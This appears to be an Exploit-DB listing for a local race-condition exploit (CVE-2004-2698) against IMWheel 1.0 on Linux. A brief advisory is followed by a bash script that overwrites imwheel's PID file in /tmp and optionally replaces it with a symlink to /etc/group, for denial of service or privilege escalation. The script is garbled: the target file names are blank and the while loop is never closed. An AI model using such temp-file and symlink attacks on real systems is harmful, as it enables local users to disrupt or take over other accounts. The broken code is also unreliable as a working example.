IMWheel 1.0 Predictable Temporary File Creation Vulnerability

ID EDB-ID:24398
Type exploitdb
Reporter I)ruid
Modified 2004-08-23T00:00:00


IMWheel 1.0 Predictable Temporary File Creation Vulnerability. CVE-2004-2698. Local exploit for linux platform


IMWheel is reported prone to a predictable temporary file creation vulnerability. This issue is a race condition error and may allow a local attacker to carry out denial of service attacks against other users and possibly gain elevated privileges.

This vulnerability was identified in IMWheel 1.0.0pre11, however, other versions may be affected as well. 


# you may have to adjust the number of characters in the print to
# get the timing correct for the injection. Fewer characters seems
# to prevent this from working. Optionally, replacing the echo
# with the symlink creation at the end of this script seems to work
# fairly regularly.

echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/
while [[ $? != 0 ]]; do
echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/

# Wait for imwheel to write it's pid to the new file
sleep 1
# Wipe the contents of the PID file.
echo > /tmp/

# Optionally, replace the new file with a link
# rm /tmp/
# ln -s /etc/group /tmp/

echo "Exploit Successful!!!"